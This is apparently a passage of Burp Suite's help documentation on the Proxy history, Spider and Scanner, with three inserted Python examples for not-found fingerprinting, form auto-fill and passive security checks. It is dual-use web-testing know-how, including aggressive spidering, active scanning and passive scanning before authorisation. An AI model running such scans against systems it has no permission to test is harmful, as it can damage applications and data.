talk HTTP/1.0 to server - This controls whether Burp Proxy enforces HTTP version
1.0 communications with the target server. The default setting is to use whichever
version of HTTP is used by the browser. Burp Proxy has been tested successfully with
most common web servers using both versions 1.0 and 1.1. However some legacy
servers or applications may require version 1.0 in order to function correctly, and so
this can be specified here.
unpack gzip / deflate - Some browsers accept gzip- and deflate-compressed content
from servers. In order to view or modify this content, it needs to be unpacked into
uncompressed form. This option controls whether Burp Proxy performs this unpacking
automatically.

History tab
This tab displays details of all requests made, and shows the target server and port
number, the HTTP method, the URL, whether the request contains parameters or was
manually modified, the HTTP status code of the response, the response size in bytes,
the MIME type of the response, the file type of the requested resource, the title of the
HTML page, whether SSL was used, the remote IP address, any cookies set by the
server, and the time of the request. This tab is useful when you have interception
turned off, as it allows you to browse without interruption whilst still monitoring key
details about application traffic.

You can click on any column heading in the history table to sort the table according to
the contents of that column (or shift-click the column to reverse-sort). For example, if
you prefer your history table to grow "upwards", with the most recent items at the top
of the table, then you can shift-click the leftmost column showing the request number.

Alternatively, if you want to group all of the requested items according to their content
type, you can click the "MIME type" column.
Below the history table is a preview pane. If you select an item from the history, the
relevant request and response (if received) will be displayed in the lower pane. If the
request or response was modified, either manually or through any rules that you have
configured, then the modified items will also be shown alongside the originals.
Right-clicking on one or more items in the history table will show a context menu
enabling you to perform various actions, including modifying the target scope, sending
the items to other Burp tools, or deleting the items from the history:

[Pro version] You can use the context menu to access various engagement tools, such
as searching for comments and scripts, analysing your target web site, scheduling
tasks, etc.

You can annotate individual or multiple items, by adding comments and highlights:

You can highlight individual items using a drop-down menu on the left-most table
column:

And you can comment individual items in-place by double-clicking and editing the table
cell:

Alternatively, if you want to annotate several items at once, you select the relevant
items and use the context menu to add comments or apply highlights:

When you have annotated interesting requests, you can use column sorting and display
filters to quickly find these items later.

In addition to viewing request details in the preview pane, you can also double-click on
any item in the table to show the request and response in a pop-up window:

The content displayed within the history table is effectively a view into an underlying
database, and you can configure filters to determine which items of underlying data are
displayed within the table. Some applications contain a large amount of content like
images, CSS, etc., which it is normally helpful to hide from view. AJAX applications
often generate large numbers of very similar asynchronous requests which you may
want to filter from view to see the more interesting items. At the top of the history
table, there is a filter bar. Clicking on this shows a popup enabling you to configure
exactly what content will be displayed within the table:

You can choose to display only requests with parameters, or which are within the
current target scope, or for which a response has been received. You can filter by MIME
type, HTTP status code and file extension. If you set a filter to hide some items, these
are not deleted, only hidden, and will reappear if you unset the relevant filter.
[Pro version] You can also specify a search term to filter on, which will only show items
containing that expression in the request or response, or within the user-added
comment if applicable.
As well as filtering, you can also permanently delete items from the history, by selecting
one or more items in the history table, and choosing "delete" from the context menu.
In some situations, it can be useful to display more than one view into the underlying
history data, and apply different filters to each view. For example, when testing access
controls, you may log into an application in different user contexts, and want to review
separately the different sequences of requests that occur in each user context. You can
open additional views of the proxy history by selecting the "show new history window"
option from the proxy history context menu. You can then configure the display filter for
each history window to show the requests that you want to see.
To use this feature to help test access controls, you need to use a separate browser for
each user context you are testing, and create a separate proxy listener in Burp for use
by each browser (you will need to update your proxy configuration in each browser to
point to the relevant listener). For each browser, you can then open a separate proxy
history window in Burp, and set the filter to show only requests from the relevant proxy
listener port. As you use the application in each browser, each history window will show
only the items for the associated user context:

In-browser controls
In addition to the main interface, you can control Burp Proxy directly from within your
browser.
The full proxy history can be accessed by visiting http://burp with your browser. The
history is displayed in a table which shows the target server and port number, the HTTP
method, the URL, the file extension, and whether or not the request was modified:

Clicking on an entry in the "URL" column displays the original request. Clicking on an
entry in the "modified?" column displays the relevant modified request.

When an individual request is displayed in full, the request can be reissued by clicking
the "repeat request" button. Depending on the currently configured interception rules
(see Options tab), the request may be displayed within Burp Proxy for modification.
When the browser receives the server's response to the re-issued request, onward
browsing can continue as normal.
If available, you can also view the original response within your browser by clicking the
"view response" button. This causes Burp Proxy to return the exact response originally
received from the server, and neither the request nor response will be displayed within
Burp Proxy for modification. Note that when the browser receives the saved response
from Burp Proxy, this may cause the browser to launch additional requests (e.g. for
embedded images). These new requests will be handled by Burp Proxy in the normal
way, and will not be returned from any previously saved data.

Extensibility
Burp Proxy is extensible via the IBurpExtender interface. This allows third-party
developers to extend the functionality of Burp Suite by creating implementations of the
interface which will be dynamically loaded and executed. The processProxyMessage()
method of this interface allows implementations to receive full details of every request
and response, to perform logging functions, modify the message, specify an action
(intercept, drop, etc) and perform any other arbitrary processing. See the source code
and Javadoc for the interface for more details.

What is Burp Spider?


Burp Spider is a tool for mapping web applications. It uses various intelligent
techniques to generate a comprehensive inventory of an application's content and
functionality.
Burp Spider maps a target application by following hyperlinks found within HTML and
JavaScript, submitting forms, and using other clues such as directory listings, source
code comments and the robots.txt file. Results are displayed in the target site map in
both tree and table format, providing a clear and highly detailed view of the target
application.
Burp Spider enables you to obtain a detailed understanding of how a web application
works, avoiding the time-consuming and unreliable task of manually following links,
submitting forms and scouring HTML source code. Potentially vulnerable application
functions can be quickly identified, allowing you to check for specific vulnerabilities such
as SQL injection and directory traversal.

Using Burp Spider


To use Burp Spider against an application requires two simple steps:

1. With your browser configured to use Burp Proxy as its proxy server, browse to
the target application. (You can turn off interception within the Proxy, to save time.)

2. Go to the site map in the "target" tab, and select the host(s) and directories
where the target application resides. Choose the "spider this host/branch" option from
the context menu.

You can also choose "spider this item" from the context menu on any request or
response within any of the Burp tools.
When you send a branch of the site map for spidering, the Spider will first check if that
branch is within the currently defined spidering scope. If not, Burp will prompt you to
confirm that you want to add the relevant URLs to the scope. Burp will then start
spidering, and will perform the following actions:

Request any unrequested URLs already discovered within the branch.

Submit any discovered forms whose action URLs lie within the branch.

Re-request any items in the branch which previously returned 304 status codes,
to retrieve a fresh (uncached) copy of the application's responses.

Parse all content retrieved to identify new URLs and forms.

Recursively repeat these steps as new content is discovered.

Continue spidering all in-scope areas until no new content is discovered.


Note that the Spider will follow links for any URLs that are within the currently defined
spidering scope. If you have already defined a wider target scope, and you select an
individual branch within this for spidering, then the Spider will follow any links into the
wider target scope, and so will spider outside of the selected branch. To ensure that the
Spider only requests items within a specific branch, you should first configure the
spidering scope to include only this branch.

You should use Burp Spider with caution. In its default configuration, the Spider will
automatically submit any forms within the spidering scope using default input values,
and will request various URLs that normal users would not ordinarily request if using
only a browser. If any URLs within your defined scope are used to perform sensitive
actions, then these actions may actually be carried out within the application. It is
normally preferable to perform some manual mapping of the application using your
browser before initiating any fully automated content discovery.

Control tab
This tab is used to start and stop Burp Spider, monitor its progress, and define the
spidering scope.

Spider running - This is used to start and stop the Spider. While the Spider is stopped
it will not make any requests of its own, although it will continue to process responses
generated via Burp Proxy, and any newly-discovered items that are within the spidering
scope will be queued to be requested if the Spider is restarted.

The display also shows some metrics about the Spider's progress, enabling you to see
the size of the in-scope content and the work remaining to fully spider it.
Clear queues - If you want to reprioritise your work, you can completely clear the
currently queued items, so that other items can be added to the queue. Note that the
cleared items may be re-queued if they remain in-scope and the Spider's parser
encounters new links to the items.
Spider scope - This panel lets you define exactly what is in-scope for the Spider to
request. If you have already configured the Suite-wide target scope with details of your
current target, then you can normally leave the default setting, which is to use the
Suite-wide scope to define the Spider's activities. If you need to define a different scope
for the Spider to use, then select "use custom scope". A further configuration panel will
appear which functions in the same way as the Suite-wide scope panel. If you have
selected to use a custom scope and you send any out-of-scope items to the Spider, then
Burp will automatically update this custom scope, rather than the Suite scope.

Options tab
This tab contains various configuration options which control the behaviour of Burp
Spider, as described below. These settings can be modified after the Spider has started
running, and will be applied retrospectively to prior results. For example, if the
maximum link depth is increased, then links which were previously outside the
maximum depth will be queued to be requested if appropriate.

check robots.txt - If checked, Burp Spider will request and process the robots.txt file
from all in-scope domains. This file is used by the robots exclusion protocol to control
the behaviour of spider-like agents on the Internet. Note that Burp Spider
does not conform to the robots exclusion protocol. Because Burp Spider is designed to
comprehensively enumerate a target application's content, all entries in robots.txt will
be requested if they are in-scope.
use cookies - If checked, Burp Spider will process Set-Cookie instructions in server
responses, and will submit any received cookies in subsequent requests to the same
domain. This option is normally necessary when spidering web applications which
persist any kind of state in a server-side session.
detect custom "not found" responses - The HTTP protocol requires web servers to
return a 404 status code if a requested resource is not found. However, many web
applications return customised "not found" pages that use a different status code. If
this is the case, then using this option can prevent false positives in the mapping of site
content. Burp Spider detects custom "not found" responses by requesting several
nonexistent resources from each domain, and compiling a fingerprint with which to
diagnose "not found" responses to other requests.
ignore links to non-text content - It is often possible to deduce the MIME type of a
particular resource from the HTML context in which links to it appear. For example,
URLs within IMG tags will probably return images; those within SCRIPT tags will
probably return JavaScript. If this option is checked, the Spider will not request items
which appear, from this context, to be non-text media resources. Using this option can
reduce spidering time with minimal risk of overlooking interesting content as a result.
request the root of all directories - If checked, Burp Spider will request all identified
web directories within the target scope, in addition to files within those directories. This
option is particularly useful if directory indexing is available on the target site.
make a non-parameterised request to each dynamic page - If checked, Burp
Spider will make a non-parameterised GET request to all in-scope form action URLs.
Dynamic pages usually respond differently if the expected parameters are not received,
and this option may successfully detect additional site content and functionality.
maximum link depth - This is the maximum number of "hops" which Burp Spider will
navigate from any seed URL. A value of zero will cause Burp Spider to request seed
URLs only. If a very large number is specified, then in-scope links will be followed
effectively indefinitely.
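The custom "not found" detection described under the options above, as an added example that is not Burp's own code: it probes a constructed sample application with nonexistent paths, normalises the probe bodies and classifies later responses against the shared template. `Response`, `sample_fetch`, the probe paths and the similarity threshold are this example's assumptions.

```python
"""Custom "not found" fingerprinting, as described for the Spider option above:
probe several nonexistent paths, normalise the bodies and keep the shared
template to classify later responses. The sample site below is constructed."""
import re
import secrets
from dataclasses import dataclass
from difflib import SequenceMatcher
from typing import Callable, Optional


@dataclass(frozen=True)
class Response:
    status: int
    body: str


@dataclass(frozen=True)
class NotFoundFingerprint:
    status: int      # status the application uses for its custom page
    template: str    # normalised body shared by the probe responses


# Parts of a body that legitimately differ between probes: the probed path
# (but not the "/" of closing tags), bare numbers and long hex tokens.
_VOLATILE = re.compile(r"(?<![<\w])/[\w./-]+|\b\d+\b|\b[0-9a-f]{8,}\b", re.I)


def normalise(body: str) -> str:
    return re.sub(r"\s+", " ", _VOLATILE.sub("", body)).strip().lower()


def similarity(a: str, b: str) -> float:
    return SequenceMatcher(None, a, b).ratio()


def random_probe_path() -> str:
    return "/" + secrets.token_hex(8)   # vanishingly unlikely to exist


def build_fingerprint(fetch: Callable[[str], Response], probes: int = 3,
                      threshold: float = 0.9) -> Optional[NotFoundFingerprint]:
    """fetch(path) returns the Response for a path on the target domain.
    Returns None when the application answers with a real 404 (status codes
    suffice) or when the probe responses are too different to fingerprint."""
    responses = [fetch(random_probe_path()) for _ in range(probes)]
    statuses = {r.status for r in responses}
    if statuses == {404} or len(statuses) != 1:
        return None
    templates = [normalise(r.body) for r in responses]
    if all(similarity(templates[0], t) >= threshold for t in templates[1:]):
        return NotFoundFingerprint(responses[0].status, templates[0])
    return None


def is_not_found(resp: Response, fp: Optional[NotFoundFingerprint],
                 threshold: float = 0.9) -> bool:
    """True for a genuine 404, or for a response matching the fingerprint."""
    if resp.status == 404:
        return True
    if fp is None or resp.status != fp.status:
        return False
    return similarity(normalise(resp.body), fp.template) >= threshold


# --- constructed sample application (not a real site) ----------------------
_PAGES = {
    "/": "<html><body><h1>Shop</h1><a href='/catalogue'>Catalogue</a></body></html>",
    "/catalogue": "<html><body><h1>Catalogue</h1><ul><li>Item 1</li></ul></body></html>",
}
_REQUEST_ID = [1000]


def sample_fetch(path: str) -> Response:
    """Serves a branded 'not found' page with status 200 and a per-request id
    instead of a real 404, the behaviour that defeats plain status-code checks."""
    if path in _PAGES:
        return Response(200, _PAGES[path])
    _REQUEST_ID[0] += 1
    return Response(200, f"<html><body><h1>Oops!</h1><p>We could not find "
                         f"{path}.</p><p>Request id {_REQUEST_ID[0]}</p></body></html>")


if __name__ == "__main__":
    fp = build_fingerprint(sample_fetch)
    for path in ("/", "/catalogue", "/admin", "/backup.zip"):
        print(path, "not found" if is_not_found(sample_fetch(path), fp) else "exists")
```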

These options control the interface between Burp Proxy and Burp Spider, which allows
"passive" spidering of web applications, controlled through your browser.
passively spider as you browse - If checked, Burp Spider will process all HTTP
requests made through Burp Proxy, to identify links and forms on web pages visited.
Using this option can enable Burp Spider to build up a detailed picture of an
application's contents even when you have only browsed a subset of that content with
your browser, because all content that is linked from visited content is automatically
added to the Suite site map.
link depth to associate with proxy requests - This option controls the "link depth"
which will be associated with web pages accessed through Burp Proxy. To prevent Burp
Spider following any links in these pages (even when the Spider is running and these
links are in-scope) set a higher value for this option than the "maximum link depth"
option above.
Note: Earlier versions of Burp Spider contained options here to control how the Spider
cookie jar was updated based on cookies in Proxy requests and responses. These
configurations have now been removed, and you should use the suite-wide session
handling support instead.

individuate forms - This option configures the criteria for individuating unique forms
(action URL, method, fields, values). When Burp Spider processes each form, it will
check these criteria to determine if the form is "new". Forms which are not new will not
be queued for submission.
do not submit - If selected, Burp Spider will not submit any forms.
prompt for guidance - If selected, Burp Spider will prompt you for guidance before
submitting each identified form. This allows you to enter custom data into form input
fields as required, and choose which submit fields to send to the server, or whether to
iterate through all submit fields.
automatically submit - If selected, Burp Spider will automatically submit any in-scope
forms using the defined rules to fill out the values of text input fields. Each rule lets you
specify a simple or regular expression to match on form field names, and the value to
submit in fields whose names match the expression. A default value can be specified for
any unmatched fields.

This option is particularly useful if you want to automatically spider through registration
forms and similar functions, where applications typically require data in a valid format
for each input field. Burp comes with a set of default rules that have proven successful
when automatically submitting form data to a wide range of applications. Of course, you
can modify these or add your own rules if you encounter form field names that you
want to submit specific values in. You should use this option with caution, as submitting
bogus values in forms may sometimes result in undesirable actions.
Many forms contain multiple SUBMIT elements, which result in different actions within
the application, and the discovery of different content. You can configure the Spider to
iterate through the values of all submit elements within forms, submitting each form
multiple times up to a configurable maximum.
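Form individuation and auto-fill rules of the kind the options above describe, as an added example that is not Burp's own code: a form counts as "new" only if its (action URL, method, field names and, optionally, values) key is unseen, each input is filled from the first rule whose pattern matches its name or else with a default value, and one parameter set is produced per submit element. The rules and the registration form are constructed; `FillRule`, `FormIndividuator` and `all_submissions` are this example's names.

```python
"""Form individuation and rule-based auto-fill, modelled on the Spider options
described above. Added example; rules and forms are constructed."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Field:
    name: str
    kind: str          # "text", "password", "hidden", "submit", ...
    value: str = ""


@dataclass(frozen=True)
class Form:
    action: str
    method: str
    fields: Tuple[Field, ...]


@dataclass(frozen=True)
class FillRule:
    pattern: str       # plain substring, or a regular expression if regex=True
    value: str
    regex: bool = False

    def matches(self, field_name: str) -> bool:
        if self.regex:
            return re.search(self.pattern, field_name, re.I) is not None
        return self.pattern.lower() in field_name.lower()


def form_key(form: Form, use_values: bool) -> tuple:
    """Individuation criteria. Including values makes the same form with a
    different hidden token (e.g. a per-page CSRF value) count as distinct."""
    fields = tuple(sorted((f.name, f.value if use_values else "") for f in form.fields))
    return (form.action, form.method.upper(), fields)


class FormIndividuator:
    """Remembers the forms already queued so duplicates are not resubmitted."""
    def __init__(self, use_values: bool = False):
        self.use_values = use_values
        self._seen = set()

    def is_new(self, form: Form) -> bool:
        key = form_key(form, self.use_values)
        if key in self._seen:
            return False
        self._seen.add(key)
        return True


def fill_form(form: Form, rules: List[FillRule], default: str,
              submit: Optional[str] = None) -> Dict[str, str]:
    """Parameter set for one submission: hidden fields keep their values, the
    other inputs are filled from the rules, and only the chosen submit element
    (the first one when none is named) is sent, as a browser would do."""
    submits = [f.name for f in form.fields if f.kind == "submit"]
    chosen = submit if submit is not None else (submits[0] if submits else None)
    params: Dict[str, str] = {}
    for f in form.fields:
        if f.kind == "submit":
            if f.name == chosen:
                params[f.name] = f.value
        elif f.kind == "hidden":
            params[f.name] = f.value
        else:
            rule = next((r for r in rules if r.matches(f.name)), None)
            params[f.name] = rule.value if rule else default
    return params


def all_submissions(form: Form, rules: List[FillRule], default: str) -> List[Dict[str, str]]:
    """One parameter set per submit element ("iterate through all submit fields")."""
    submits = [f.name for f in form.fields if f.kind == "submit"] or [None]
    return [fill_form(form, rules, default, s) for s in submits]


# constructed rules, in priority order (not Burp's default rule set)
SAMPLE_RULES = [
    FillRule("email", "test@example.com"),
    FillRule(r"^(tel|phone|mobile)", "5551234567", regex=True),
    FillRule(r"(post|zip)_?code", "12345", regex=True),
    FillRule("pass", "Passw0rd!"),
]

# constructed registration form with two submit buttons
REGISTER = Form("/register", "post", (
    Field("csrf", "hidden", "token-A"),
    Field("email", "text"),
    Field("telephone", "text"),
    Field("password", "password"),
    Field("nickname", "text"),
    Field("register", "submit", "Create account"),
    Field("check", "submit", "Check availability"),
))

if __name__ == "__main__":
    for params in all_submissions(REGISTER, SAMPLE_RULES, "test"):
        print(params)
```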

Login forms play a particular role within applications, and you will often want Burp to
handle these in a different way than ordinary forms. Using this configuration, you can
tell the Spider to perform one of four different actions when a login form is
encountered:

Burp can ignore the login form, if you don't have credentials, or are concerned
about spidering sensitive protected functionality.

Burp can prompt you for guidance interactively, enabling you to specify
credentials on a case-by-case basis. This is the default option.

Burp can handle login forms in the same way as any other form, using the
configuration and auto-fill rules you have configured for those.

Burp can automatically submit specific credentials in every login form that is
encountered.

In the last case, any time Burp encounters a form containing a password field, it will
submit your configured password in that field, and will submit your configured
username in the text input field whose name most looks like a username field. If you
have credentials for an application, and want to let the Spider handle the login for you,
then this is normally the best option.

These options let you fine-tune the spidering engine, depending on the performance
impact on the application, and on your own processing power and bandwidth. If you
find that the Spider is running slowly, but the application is performing well and your
own CPU utilisation is low, you can increase the number of scan threads to make your
scans proceed faster. If you find that connection errors are occurring, that the
application is slowing down, or that your own computer is locking up, you should reduce
the thread count, and maybe increase the number of retries on network failure and the
pause between retries.

Request headers - This section allows customised HTTP headers to be configured
which will be used in all requests. This may be useful to meet specific requirements of
individual applications - e.g. to emulate an expected user agent when testing
applications designed for mobile devices.
use Referer header - If checked, Burp Spider will submit the relevant Referer header
when requesting any item that was linked to from another page.

Spider results
All of the content discovered during spidering is added to the target site map that is
shared between Suite components. This map shows tree and table views of the content
discovered via the Spider and Proxy. It lets you filter from view any items you are not
interested in, and perform numerous other actions such as initiating vulnerability scans
and further spidering, and sending individual requests to other Burp tools to perform
customised attacks. Please consult the site map help for further details.

What is Burp Scanner?


Burp Scanner is a tool for performing automated discovery of security vulnerabilities in
web applications. It is designed to be used by penetration testers, and to fit in closely
with your existing techniques and methodologies for performing manual and
semi-automated penetration tests of web applications.
Using most web scanners is a detached exercise: you provide a start URL, click "go",
and watch a progress bar update until the scan is finished and a report is produced.
Using Burp Scanner is very different, and is much more tightly integrated with the
actions you are already carrying out when attacking an application, giving you
fine-grained control over each request that gets scanned, and direct feedback about the
results.
Burp Scanner can perform two types of scans:

Active scanning - The scanner sends various crafted requests to the
application, derived from a base request, and analyses the resulting responses looking
for vulnerable behaviour.

Passive scanning - The scanner doesn't send any new requests of its own; it
merely analyses the contents of existing requests and responses, and deduces
vulnerabilities from those.
You can initiate scans against your target application in two different ways:

Manual scanning - You can send one or more requests from other Burp tools,
to perform active or passive scans against those specific requests.

Live scanning as you browse - You can configure the Scanner to automatically
perform active or passive scans against requests passing through the Proxy as you are
browsing the application.
This approach to automated vulnerability detection brings a number of benefits to the
penetration tester:

Being able to perform quick and reliable scans for many common vulnerabilities
on a per-request basis can hugely reduce your testing effort, enabling you to direct
your human expertise towards vulnerabilities whose detection cannot be reliably
automated.

Results from each type of scan are displayed immediately, and can directly
inform your other testing actions in relation to the individual requests involved.

Burp avoids a frustrating problem with other scanners, in which a monolithic
automated scan takes an age to complete, with little assurance over whether the scan
has worked, or whether it encountered problems that impacted on its effectiveness.
By controlling exactly what gets scanned, and by monitoring in real time both the scan
results and the wider effects on the application, Burp Scanner lets you combine the
virtues of reliable automation with intuitive human intelligence, often with devastating
results.

Active scanning
In this mode of scanning, Burp takes an individual request to the application, called the
"base request", and modifies it in various ways designed to trigger behaviour that
indicates the presence of various vulnerabilities. These modified requests are sent to
the application, and the resulting responses are analysed. In many cases, further
requests will be sent, based on the results of the initial probes.
This mode of operation generates large numbers of requests which are malicious in
form and which may result in compromise of the application. You should use this
scanning mode with caution, only with the explicit permission of the application owner,
and having warned them of the possible effects which automated scanning may have on
the application and its data. If possible, scanning should be performed against
non-production systems, and full backups performed prior to scanning.
There are various well-known limitations on the types of vulnerabilities within web
applications whose detection can be reliably automated. Burp's active scanning
capabilities were designed to focus on the kind of input-based bugs that
scanners can reliably look for. By avoiding the false positives that arise in other areas,
Burp gives you confidence in its output, leaving you to focus on the aspects of the job
that require human experience and intelligence to deliver.
The issues that Burp's active scanning is able to identify mostly fall into two categories:

1. Input-based vulnerabilities targeting the client side, such as cross-site scripting,
HTTP header injection, and open redirection.

2. Input-based vulnerabilities targeting the server side, such as SQL injection, OS
command injection, and file path traversal.
Issues in category 1 can be detected with a very high degree of reliability. In most
cases, everything that is relevant to finding the bug is visible on the client side. For
example, to detect reflected XSS, Burp Scanner submits some benign input in each
entry point to the application, and looks for this being echoed in responses. If it is
echoed, Burp then parses the response content to determine the context(s) in which
the echoed input appears. It then supplies various modified inputs to determine
whether strings that constitute an attack in those contexts are also echoed. Burp
Scanner has knowledge of the wide range of broken input filters, and associated
bypasses, that arise with web applications, and it checks for all that apply to the
context. By implementing a full decision tree of checks, driven by feedback from
preceding checks, Burp effectively emulates the actions that a skilled and methodical
human tester would perform. The only bugs that Burp should miss are those with some
unusual feature requiring intelligence to understand, such as a custom scheme for
encapsulating inputs.
Issues in category 2 are inherently less amenable to automated detection, because in
many cases the behaviours that are relevant to identifying the bugs occur only on the
server, with little manifestation on the client side. For example, SQL injection bugs may
return verbose database errors in responses, or they may be fully blind. Burp Scanner
employs various techniques to identify blind server-side injection issues, by inducing
time delays, changing Boolean conditions and performing fuzzy response diffing, etc.
These techniques are inherently more error prone than the methods that are available
in category 1. Nevertheless, Burp Scanner achieves a high success rate in this area,
reliably reporting numerous kinds of issue that are difficult or laborious for a human
tester to diagnose.

Passive scanning
In this mode of scanning, Burp doesn't send any new requests to the application - it
merely analyses the contents of existing requests and responses, and deduces
vulnerabilities from those. This mode of operation can be used safely and legally in any
situation in which you are authorised to access the application.
Burp Scanner is able to identify numerous kinds of vulnerabilities using solely passive
techniques, including:

Clear-text submission of passwords.

Insecure cookie attributes, like missing HttpOnly and secure flags.

Liberal cookie scope.

Cross-domain script includes and Referer leakage.

Forms with autocomplete enabled.

Caching of SSL-protected content.

Directory listings.

Submitted passwords returned in later responses.

Insecure transmission of session tokens.

Leakage of information like internal IP addresses, email addresses, stack traces,
etc.

Insecure ViewState configuration.

Ambiguous, incomplete, incorrect or non-standard Content-type directives.


Many of these issues are relatively unexciting, and recording them is dull and repetitive
for a human. But as penetration testers we are obliged to report them. Having Burp
Scanner reliably mop up these issues as you browse an application is a time and sanity
saver.
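Several of the passive checks listed above, run over one captured request and response without sending anything, as an added example that is not Burp Scanner's own code: clear-text password submission, the password echoed back, cookie flags and scope, password autocomplete, caching of HTTPS content, Content-type directives and internal IP leakage. The HTTP messages are constructed samples, and the issue names, severities and check logic are this example's assumptions.

```python
"""Passive checks of the kinds listed above, run over a captured request and
response without sending anything. Added example; the sample messages are
constructed and the issue names and logic are this example's, not Burp's."""
import re
from dataclasses import dataclass
from typing import List, Tuple
from urllib.parse import parse_qs


@dataclass
class Message:
    start_line: str
    headers: List[Tuple[str, str]]   # a list, not a dict: Set-Cookie may repeat
    body: str


@dataclass(frozen=True)
class Issue:
    name: str
    severity: str
    detail: str


def parse_http(raw: str) -> Message:
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return Message(lines[0], headers, body)


def header(msg: Message, name: str) -> List[str]:
    return [v for n, v in msg.headers if n == name.lower()]


PASSWORD_PARAM = re.compile(r"pass(word|wd)?|pwd", re.I)
PRIVATE_IP = re.compile(r"\b(?:10\.\d{1,3}|192\.168|172\.(?:1[6-9]|2\d|3[01]))\.\d{1,3}\.\d{1,3}\b")


def passive_scan(request_raw: str, response_raw: str, https: bool) -> List[Issue]:
    req, resp = parse_http(request_raw), parse_http(response_raw)
    issues: List[Issue] = []
    # Clear-text password submission, and the submitted password echoed back
    params = parse_qs(req.body)
    pw_params = [p for p in params if PASSWORD_PARAM.search(p)]
    if pw_params and not https:
        issues.append(Issue("Clear-text submission of password", "high", ",".join(pw_params)))
    for p in pw_params:
        if any(v and v in resp.body for v in params[p]):
            issues.append(Issue("Submitted password returned in response", "medium", p))
    # Cookie flags and scope, one Set-Cookie header at a time
    for cookie in header(resp, "set-cookie"):
        cname = cookie.split("=", 1)[0].strip()
        attrs = [a.strip().lower() for a in cookie.split(";")[1:]]
        if "httponly" not in attrs:
            issues.append(Issue("Cookie without HttpOnly flag", "low", cname))
        if https and "secure" not in attrs:
            issues.append(Issue("Cookie without Secure flag", "low", cname))
        domain = next((a[len("domain="):] for a in attrs if a.startswith("domain=")), "")
        if domain.startswith("."):
            issues.append(Issue("Liberal cookie scope", "info", f"{cname} on {domain}"))
    # Password field whose autocomplete is still enabled
    if (re.search(r"<input[^>]*type=['\"]?password", resp.body, re.I)
            and not re.search(r"autocomplete=['\"]?off", resp.body, re.I)):
        issues.append(Issue("Password field with autocomplete enabled", "low", ""))
    # Caching of SSL-protected content
    cache = " ".join(header(resp, "cache-control")).lower()
    if https and "no-store" not in cache:
        issues.append(Issue("Cacheable HTTPS response", "info", cache or "no Cache-Control"))
    # Missing or incomplete Content-type
    ctype = header(resp, "content-type")
    if not ctype:
        issues.append(Issue("Missing Content-type directive", "low", ""))
    elif ctype[0].lower().startswith("text/") and "charset=" not in ctype[0].lower():
        issues.append(Issue("Content-type without charset", "info", ctype[0]))
    # Internal addresses leaked in the body
    for ip in PRIVATE_IP.findall(resp.body):
        issues.append(Issue("Internal IP address disclosed", "info", ip))
    return issues


# --- constructed sample exchange (not captured from a real application) ----
SAMPLE_REQUEST = (
    "POST /login HTTP/1.1\r\nHost: shop.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "username=alice&password=hunter2"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
    "Set-Cookie: session=abc123; Path=/\r\n"
    "Set-Cookie: tracker=1; Domain=.example; Path=/; HttpOnly\r\n\r\n"
    "<html><body><form action='/login' method='post'>"
    "<input type='password' name='password'></form>"
    "<!-- upstream 10.0.2.15 --><p>Welcome alice (password hunter2 ok)</p></body></html>"
)

if __name__ == "__main__":
    for issue in passive_scan(SAMPLE_REQUEST, SAMPLE_RESPONSE, https=False):
        print(f"[{issue.severity}] {issue.name}: {issue.detail}")
```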
Being able to carry out passive-only vulnerability scanning is beneficial in a range of
situations:

Because passive scans don't send any new requests to the application, you can
perform them safely against critical production applications where you want total
control of every request that you send.

Some applications are aggressive in reacting to attacks, by terminating your
session or locking your account every time an apparently malicious request is received.
In this situation, you may be restricted to piecemeal manual testing, but you can still
use passive scanning to identify various kinds of issues without causing any problems.

If you don't (yet) have authorisation to attack a target, you can use passive
scanning to identify vulnerabilities purely by browsing the application as a normal user.
For example, if you are proposing for a new penetration testing engagement, you can
passively scan your target to get a feel for its security posture, and hopefully get some
reportable issues in the bag before you even begin the official testing.

Initiating scans
Manual scanning
From anywhere within Burp Suite, you can select one or more HTTP requests, and send
these to the Scanner to perform active or passive scanning. For example, if you
intercept an interesting request using Burp Proxy, you can initiate a scan against just
this request using the context menu:

Similarly, you can select sets of requests from within the Target site map or Proxy
history, and send these in bulk to the Scanner. So, after browsing around an application
and building up a comprehensive map of its content, you can tell Burp to scan specific
areas of the application's functionality:

If you select multiple items and send these for active scanning, Burp launches a brief
wizard which lets you fine-tune your selection. The first screen of the wizard offers you
various intuitive filters to remove potentially unnecessary items (duplicates, already
scanned items, media content, etc.), and shows you how many items will be affected by
each filter:

The second screen of the wizard shows you a list of the remaining items, and lets you
sort the table by various relevant properties, view the full requests and responses, and
delete individual items:

The wizard then completes and the selected items are sent for scanning in the usual
way.

Live scanning
A further way to initiate scans is to use the "live scanning" feature. In this mode, you
tell Burp what your target scope is for active and passive scanning, and it will
automatically initiate active or passive scans against relevant requests as you use the
application. When operating in this mode, you simply need to browse around the
application as a normal user, to show Burp where the application's content and
functionality are, and it will work away in the background to find vulnerabilities for you.
When using live scanning, you have fine-grained control over the requests that Burp will
automatically scan. If you have already configured a suite-wide target scope for your
current work, then you can simply tell Burp to scan every request that falls within that
scope. Alternatively, you can define a custom scope to use for active and passive
scanning. In the example below, Burp has been configured to actively scan every
request that is made to www.myapp.com, with the exception of login requests, and to
passively scan every request that is made to any destination whatsoever:

Note that the live scanning feature ignores requests for media resources (images, etc.)
where the request does not contain any non-cookie parameters. Requests like these are
virtually always for static resources which do not have any security significance, and so
can be safely ignored by the scanner. (This does not apply to manual scanning - if you
manually select items like these and send them for active scanning, then they will of
course be scanned in the normal way.)

Active scan queue


When you send requests for passive scanning, these are processed immediately.
Because active scans involve sending large numbers of requests to the server, requests
sent for active scanning may be queued up. A typical request with a dozen parameters
will be scanned in a minute or two, and the scan queue is processed by a configurable
thread pool, so the number of waiting items rarely grows very large. As each item is
scanned, the scan queue table indicates its progress - the number of requests made,
the percentage complete, and the number of vulnerabilities identified. This last value is
colourised according to the significance and confidence attached to the most serious
issue:

You can double-click any item in the scan queue to display the issues identified so far,
and view the base request and response for that item:

You can use the context menu on the scan queue to perform various actions:

Show the details of the selected item.

Cancel the selected item(s).

Scan the selected item(s) again.

Pause or resume the scanner.


Used in the ways described, Burp Scanner gives you fine-grained control over
everything that it does, and integrates closely with your other testing activities. It lets
you prioritise areas of an application that interest you, by browsing them using live
